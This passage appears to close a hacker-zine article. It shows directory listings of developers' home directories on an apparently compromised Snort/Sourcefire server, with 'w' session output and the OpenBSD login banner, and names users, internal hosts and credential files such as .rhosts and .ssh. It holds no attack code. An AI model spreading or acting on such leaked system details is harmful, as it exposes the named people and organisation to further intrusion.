-rw-r--r--   1 dr    dr      1298944 --- -- ---- SnortWin32-183.exe
-rw-r--r--   1 dr    dr      1644032 --- -- ---- SnortWin32-183F.exe
-rw-r--r--   1 dr    dr     63856017 --- -- ---- base29.tgz
-rw-r--r--   1 dr    dr     73947166 --- -- ---- base29.tgz_10_2_01
-rw-r--r--   1 dr    dr     56005424 --- -- ---- base29.tgz_7_25_01
-rw-r--r--   1 dr    dr      2262062 --- -- ---- bsd
-rwxr-xr-x   1 dr    dr          332 --- -- ---- buildfxp0
-rwxr-xr-x   1 dr    dr          332 --- -- ---- buildfxp0.sh
-rwxr-xr-x   1 dr    dr          332 --- -- ---- buildfxp1
-rwxr-xr-x   1 dr    dr          332 --- -- ---- buildfxp1.sh
drwxr-xr-x   2 dr    dr         5120 --- -- ---- buttons
-rw-r--r--   1 dr    dr        61476 --- -- ---- buttons.tgz
-rw-r--r--   1 dr    dr        10435 --- -- ---- data_analysis.php
-rw-r--r--   1 dr    dr         3879 --- -- ---- day_graph.php
-rw-r--r--   1 dr    dr         9297 --- -- ---- dst_port_summary.php
-rw-r--r--   1 dr    dr         8654 --- -- ---- event_display.php
-rw-r--r--   1 dr    dr         7623 --- -- ---- events.php
-rw-r--r--   1 dr    dr         7982 --- -- ---- events_actionpage.php
-rw-r--r--   1 dr    dr          337 --- -- ---- fill.html
-rw-r--r--   1 dr    dr          337 --- -- ---- fxp0stat.php
-rw-r--r--   1 dr    dr         3869 --- -- ---- hr_graph.php
-rw-r--r--   1 dr    dr         4080 --- -- ---- incident_name_page.php
-rw-r--r--   1 dr    dr         6630 --- -- ---- incident_page.php
-rw-r--r--   1 dr    dr         3928 --- -- ---- ip_graph.php
-rw-r--r--   1 dr    dr       204529 --- -- ---- j.tgz
-rw-r--r--   1 root  dr       133029 --- -- ---- libprelude-latest.tar.gz
-rw-r--r--   1 dr    dr         1457 --- -- ---- mfoot.php
-rw-r--r--   1 dr    dr         5281 --- -- ---- mfrm.php
-rw-r--r--   1 dr    dr         6034 --- -- ---- mhead.php
-rw-r--r--   1 dr    dr        74936 --- -- ---- nbut.tgz
-rw-r--r--   1 dr    dr         9035 --- -- ---- packet_display.php
-rw-r--r--   1 dr    dr         3920 --- -- ---- port_graph.php
-rw-r--r--   1 root  dr       424844 --- -- ---- prelude-nids-latest.tar.gz
-rw-r--r--   1 dr    dr         6254 --- -- ---- query_page.php
-rw-r--r--   1 dr    dr        30395 --- -- ---- redit.php
drwxr-xr-x   2 dr    dr         1024 --- -- ---- rules
-rwxr-xr-x   1 dr    dr          167 --- -- ---- rulesdiff
-rwxr-xr-x   1 dr    dr          165 --- -- ---- rulesupdate
-rw-r--r--   1 dr    dr          881 --- -- ---- save_report.php
-rw-r--r--   1 dr    dr         8230 --- -- ---- search.php
drwxrwxrwx   4 dr    dr          512 --- -- ---- sf_final
-rw-r--r--   1 dr    dr       391292 --- -- ---- sf_final.tgz
-rw-r--r--   1 dr    dr      6326083 --- -- ---- sfht.tgz
-rw-r--r--   1 dr    dr         5563 --- -- ---- sfire.jpg
-rw-r--r--   1 dr    dr         6538 --- -- ---- sflogo.jpg
-rw-r--r--   1 dr    dr        12623 --- -- ---- sfpost.tgz
-rw-r--r--   1 dr    dr         4772 --- -- ---- show_incident_report.php
-rw-r--r--   1 dr    dr         5051 --- -- ---- show_query_report.php
-rwxr-xr-x   1 dr    dr        18746 --- -- ---- snorthup
-rw-r--r--   1 dr    dr         1514 --- -- ---- snortstat.php
-rw-r--r--   1 dr    dr         9283 --- -- ---- src_ip_summary.php
-rw-r--r--   1 dr    dr         7504 --- -- ---- stats_actionpage.php
-rw-r--r--   1 dr    dr          648 --- -- ---- style.php
-rw-r--r--   1 dr    dr         1566 --- -- ---- syslog.php
-rw-r--r--   1 dr    dr         3567 --- -- ---- time.php
-rw-r--r--   1 dr    dr         1769 --- -- ---- top.php
-rw-r--r--   1 dr    dr           33 --- -- ---- user.f
-rw-r--r--   1 dr    dr          529 --- -- ---- webinterface.php
-rw-r--r--   1 dr    dr          702 --- -- ---- yframe14mod.jpg
-rw-r--r--   1 dr    dr          587 --- -- ---- yframe8mod.jpg
-rw-r--r--   1 dr    dr         3218 --- -- ---- yfrm.php
-rw-r--r--   1 dr    dr        21548 --- -- ---- yfrm.tgz

jasonl:
total 14470
drwxr-xr-x   3 jasonl  jasonl      512 --- -- ---- .
drwxr-xr-x  15 root    wheel       512 --- -- ---- ..
-rw-r--r--   1 jasonl  jasonl      769 --- -- ---- .cshrc
-rw-------   1 jasonl  jasonl     1061 --- -- ---- .history
-rw-r--r--   1 jasonl  jasonl      318 --- -- ---- .login
-rw-r--r--   1 jasonl  jasonl      105 --- -- ---- .mailrc
-rw-r--r--   1 jasonl  jasonl      201 --- -- ---- .profile
-rw-------   1 jasonl  jasonl      128 --- -- ---- .rhosts
drwx------   2 jasonl  jasonl      512 --- -- ---- .ssh
-rw-r--r--   1 jasonl  jasonl     7503 --- -- ---- cannon.c
-rw-r--r--   1 jasonl  jasonl      205 --- -- ---- cannon.h
-rw-r--r--   1 jasonl  jasonl  5846298 --- -- ---- jason.tmp.tar
-r--r--r--   1 jasonl  jasonl   326290 --- -- ---- mcrypt-2.5.10.tar.gz
-rw-r--r--   1 jasonl  jasonl    18777 --- -- ---- mstring.c
-rw-r--r--   1 jasonl  jasonl     1486 --- -- ---- mstring.h
-rw-r--r--   1 jasonl  jasonl   204849 --- -- ---- mysql.tgz
-rw-r--r--   1 jasonl  jasonl   799182 --- -- ---- mysql_db_setup
-rw-r--r--   1 jasonl  jasonl      258 --- -- ---- mysql_system_setup
-rw-r--r--   1 jasonl  jasonl    99603 --- -- ---- nitro.c
-rw-r--r--   1 jasonl  jasonl    10457 --- -- ---- php_nitro.h
-rwxr-xr-x   1 jasonl  jasonl    14590 --- -- ---- sfserver

jed:
total 58450
drwxr-xr-x   5 jed   jed        1024 --- -- ---- .
drwxr-xr-x  15 root  wheel       512 --- -- ---- ..
-rw-r--r--   1 jed   jed         769 --- -- ---- .cshrc
-rw-------   1 jed   jed        2324 --- -- ---- .history
-rw-r--r--   1 jed   jed         318 --- -- ---- .login
-rw-r--r--   1 jed   jed         105 --- -- ---- .mailrc
-rw-r--r--   1 jed   jed         201 --- -- ---- .profile
-rw-------   1 jed   jed         128 --- -- ---- .rhosts
drwx------   2 jed   jed         512 --- -- ---- .ssh
drwxr-xr-x   2 jed   jed         512 --- -- ---- DB
dr-xr-xr-x   2 jed   jed         512 --- -- ---- Java
-rw-r--r--   1 jed   jed       55581 --- -- ---- NitroDB.h
-rw-r--r--   1 jed   jed       51200 --- -- ---- PacketLibrary.tar
-rw-r--r--   1 jed   jed      716800 --- -- ---- barnyard-sf.tar
-rw-r--r--   1 jed   jed      983040 --- -- ---- barnyard.tar
-rw-r--r--   1 jed   jed      161450 --- -- ---- barnyard.tar.gz
-rw-r--r--   1 jed   jed      245760 --- -- ---- bug.tar
-rwxr-xr-x   1 jed   jed       11743 --- -- ---- hello
-rwxr-xr-x   1 jed   jed     1457796 --- -- ---- httpd
-rw-r--r--   1 jed   jed       33802 --- -- ---- httpd.conf
-rwxr--r--   1 jed   jed     1248812 --- -- ---- libNitroDB-glibc2.1.so.2.0.0
-r--r--r--   1 jed   jed      868364 --- -- ---- libNitroDB-glibc2.2.so.2.0.0
-rwxr-xr-x   1 jed   jed     1247196 --- -- ---- libNitroDB.so
-rwxr--r--   1 jed   jed      719172 --- -- ---- libNitroSock-glibc2.1.so.2.0.0
-r--r--r--   1 jed   jed      756776 --- -- ---- libNitroSock-glibc2.2.so.2.0.0
-rw-r--r--   1 jed   jed      756808 --- -- ---- libNitroSock.so
-rwxr-xr-x   1 jed   jed     2818615 --- -- ---- php
-rw-r--r--   1 jed   jed       51200 --- -- ---- sf.tar
-rwxr-xr-x   1 jed   jed       18533 --- -- ---- sfRebuild
-rw-r--r--   1 jed   jed       20480 --- -- ---- sfRebuild.tar
-rwxr--r--   1 jed   jed        4137 --- -- ---- sfdb.dfl
-rwxr-xr-x   1 jed   jed       13366 --- -- ---- sfserver
-rwxr-xr-x   1 jed   jed       14590 --- -- ---- sfserver.old
-rw-r--r--   1 jed   jed       51200 --- -- ---- sfserver.tar
-rw-r--r--   1 jed   jed     1706939 --- -- ---- snort-1.8.3.tar.gz
-rw-------   1 jed   jed      203065 --- -- ---- snort-unified.log.1011651374
-rwxr-xr-x   1 jed   jed       11762 --- -- ---- snort.dfl
-rwxr-xr-x   1 jed   jed       23168 --- -- ---- snort.src
-rwxr-xr-x   1 jed   jed       59578 --- -- ---- unifiedClient
-rwxr-xr-x   1 jed   jed       75223 --- -- ---- unifiedServer
-rw-------   1 jed   jed    14811859 --- -- ---- unifiedServer.core.gz
-rw-r--r--   1 jed   jed      512000 --- -- ---- unifiedServer.tar

jpavlick:
total 50
drwxr-xr-x   3 jpavlick  jpavlick    512 --- -- ---- .
drwxr-xr-x  15 root      wheel       512 --- -- ---- ..
-rw-r--r--   1 jpavlick  jpavlick    769 --- -- ---- .cshrc
-rw-------   1 jpavlick  jpavlick   2572 --- -- ---- .history
-rw-r--r--   1 jpavlick  jpavlick    318 --- -- ---- .login
-rw-r--r--   1 jpavlick  jpavlick    105 --- -- ---- .mailrc
-rw-r--r--   1 jpavlick  jpavlick    201 --- -- ---- .profile
-rw-------   1 jpavlick  jpavlick    128 --- -- ---- .rhosts
drwx------   2 jpavlick  jpavlick    512 --- -- ---- .ssh
-rw-r--r--   1 jpavlick  jpavlick  13735 --- -- ---- index.htm
-rw-r--r--   1 root      jpavlick      0 --- -- ---- me

mikef:
total 14
drwxr-xr-x   2 mikef  mikef  512 --- -- ---- .
drwxr-xr-x  15 root   wheel  512 --- -- ---- ..
-rw-r--r--   1 mikef  mikef  769 --- -- ---- .cshrc
-rw-r--r--   1 mikef  mikef  318 --- -- ---- .login
-rw-r--r--   1 mikef  mikef  105 --- -- ---- .mailrc
-rw-r--r--   1 mikef  mikef  201 --- -- ---- .profile
-rw-------   1 mikef  mikef  128 --- -- ---- .rhosts

phil:
total 14
drwxr-xr-x   2 phil  phil   512 --- -- ---- .
drwxr-xr-x  15 root  wheel  512 --- -- ---- ..
-rw-r--r--   1 phil  phil   621 --- -- ---- .cshrc
-rw-r--r--   1 phil  phil   318 --- -- ---- .login
-rw-r--r--   1 phil  phil   105 --- -- ---- .mailrc
-rw-r--r--   1 phil  phil   201 --- -- ---- .profile
-rw-------   1 phil  phil   128 --- -- ---- .rhosts

roesch:
total 393860
drwxr-xr-x   8 roesch  roesch      1024 --- -- ---- .
drwxr-xr-x  15 root    wheel        512 --- -- ---- ..
drwx------   3 roesch  roesch       512 --- -- ---- .BitchX
-rw-r--r--   1 roesch  roesch       621 --- -- ---- .cshrc
-rw-------   1 roesch  roesch      2452 --- -- ---- .history
-rw-r--r--   1 roesch  roesch       318 --- -- ---- .login
-rw-r--r--   1 roesch  roesch       105 --- -- ---- .mailrc
-rw-r--r--   1 roesch  roesch       201 --- -- ---- .profile
-rw-------   1 roesch  roesch       128 --- -- ---- .rhosts
drwx------   2 roesch  roesch       512 --- -- ---- .ssh
drwxr-xr-x   6 roesch  roesch       512 --- -- ---- 3.1
-rw-r--r--   1 roesch  roesch        49 --- -- ---- README
-rw-r--r--   1 roesch  roesch     84470 --- -- ---- TR94-17.ps
-r-xr-xr-x   1 dr      dr      89395561 --- -- ---- csv11full.exe
-rw-r--r--   1 roesch  roesch     19056 --- -- ---- gpgstuff.tgz
-r-xr-xr-x   1 dr      dr      69335386 --- -- ---- hl1107.exe
-rw-r-----   1 roesch  roesch  30892631 --- -- ---- honeynet.tar.gz
-rw-r--r--   1 roesch  roesch     13441 --- -- ---- index.htm
-rw-r--r--   1 roesch  roesch       806 --- -- ---- index.html
-rw-r--r--   1 roesch  roesch    133029 --- -- ---- libprelude-latest.tar.gz
-rw-r--r--   1 roesch  roesch   1179507 --- -- ---- new_pdf_files.zip
-rw-r--r--   1 roesch  roesch     10885 --- -- ---- news_update 3_1_02.zip
drwxr-xr-x   7 roesch  roesch      2048 --- -- ---- nmap-2.54BETA34
-rw-r--r--   1 roesch  roesch    861995 --- -- ---- nmap-2.54BETA34.tgz
-rw-r--r--   1 roesch  roesch    398595 --- -- ---- openssh-3.4.tgz
-rw-r--r--   1 roesch  roesch       605 --- -- ---- out
-rw-r--r--   1 roesch  roesch      3119 --- -- ---- pr3.htm
-rw-r--r--   1 roesch  roesch    424844 --- -- ---- prelude-nids-latest.tar.gz
-rw-r--r--   1 roesch  roesch      3837 --- -- ---- revised_console_index.ZIP
-rw-r--r--   1 roesch  roesch      5844 --- -- ---- revised_screens.zip
-rw-r--r--   1 roesch  roesch   3036128 --- -- ---- sf_website.zip
-rw-r--r--   1 roesch  roesch      5681 --- -- ---- sflogo2.gif
drwxr-xr-x  11 roesch  roesch      1024 --- -- ---- snort
-rw-r--r--   1 roesch  roesch   1714632 --- -- ---- snort-1.8.4-beta4.tar.gz
-rw-r--r--   1 roesch  roesch   1731645 --- -- ---- snort-1.8.4-beta5.tar.gz
-rw-r--r--   1 roesch  roesch   1766532 --- -- ---- snort-1.8.4.tar.gz
-rw-r--r--   1 roesch  roesch    350535 --- -- ---- snort-1.8.4.tgz
drwxr-xr-x  15 roesch  roesch      4096 --- -- ---- ssh

sfuser1:
total 26
drwxr-xr-x   3 sfuser1  sfuser1  1536 --- -- ---- .
drwxr-xr-x  15 root     wheel     512 --- -- ---- ..
-rw-r--r--   1 sfuser1  sfuser1   769 --- -- ---- .cshrc
-rw-r--r--   1 sfuser1  sfuser1   318 --- -- ---- .login
-rw-r--r--   1 sfuser1  sfuser1   105 --- -- ---- .mailrc
-rw-r--r--   1 sfuser1  sfuser1   201 --- -- ---- .profile
-rw-------   1 sfuser1  sfuser1   128 --- -- ---- .rhosts
-rw-r--r--   1 sfuser1  sfuser1  3034 --- -- ---- logs.out
drwxr-xr-x   2 sfuser1  sfuser1  1536 --- -- ---- veridian

sschwing:
total 14
drwxr-xr-x   2 sschwing  sschwing  512 --- -- ---- .
drwxr-xr-x  15 root      wheel     512 --- -- ---- ..
-rw-r--r--   1 sschwing  sschwing  769 --- -- ---- .cshrc
-rw-r--r--   1 sschwing  sschwing  318 --- -- ---- .login
-rw-r--r--   1 sschwing  sschwing  105 --- -- ---- .mailrc
-rw-r--r--   1 sschwing  sschwing  201 --- -- ---- .profile
-rw-------   1 sschwing  sschwing  128 --- -- ---- .rhosts

tburgess:
total 3040
drwxr-xr-x   4 tburgess  tburgess      512 --- -- ---- .
drwxr-xr-x  15 root      wheel         512 --- -- ---- ..
-rw-r--r--   1 tburgess  tburgess      769 --- -- ---- .cshrc
-rw-------   1 tburgess  tburgess     2265 --- -- ---- .history
-rw-r--r--   1 tburgess  tburgess      318 --- -- ---- .login
-rw-r--r--   1 tburgess  tburgess      105 --- -- ---- .mailrc
-rw-r--r--   1 tburgess  tburgess      201 --- -- ---- .profile
-rw-------   1 tburgess  tburgess      128 --- -- ---- .rhosts
drwx------   2 tburgess  tburgess      512 --- -- ---- .ssh
-rw-r--r--   1 tburgess  tburgess  1525673 --- -- ---- ossh-comp29-33.tgz
drwxr-xr-x  15 tburgess  tburgess     4608 --- -- ---- ssh

w;
--:---M  up --- days,  -:--, 12 users, load averages: 0.29, 0.19, 0.12
USER    TTY FROM              LOGIN@  IDLE WHAT
cmg      p0 snorty-ext:S.3   -------  -:-- -usr/local/bin/tcsh
cmg      p1 snorty-ext:S.0   -------     - epic irc.secsup.uu.net
bmc      p2 sdsl-64-32-241-7 -------     - BitchX cazz irc.secsup.uu.net
cmg      p3 snorty-ext:S.4   ---------days -sh
cmg      p4 snorty-ext:S.2   ---------days ssh ns1
cmg      p5 snorty-ext:S.6   -------  -:-- -usr/local/bin/tcsh
bmc      p6 sdsl-64-32-241-7 -------     - BitchX cazz irc.openprojects.net
bmc      p7 sdsl-64-32-241-7 -------     - BitchX cazz irc.shmoo.com
cmg      p9 snorty-ext:S.7   -------  -:-- -usr/local/bin/tcsh
cmg      pb snorty-ext:S.1   ------- -days ssh www.sourcefire.com
cmg      pd snorty-ext:S.5   ------- -days ssh mail
cmg      q2 snorty-ext:S.8   -------  -:-- -usr/local/bin/tcsh
cat /etc/motd
OpenBSD 2.9 (FW) #0: Fri --- -- ----:-- EDT ----




[=-- Bibliography --=]

1. About Snort - [http://www.snort.org/about.html]

2. Honeynet Related Research Projects -
   [http://www.honeynet.org/research/index.html]

3. Snort Rules Database - [http://www.snort.org/snort-db/]




|=[ EOF ]=---------------------------------------------------------------=|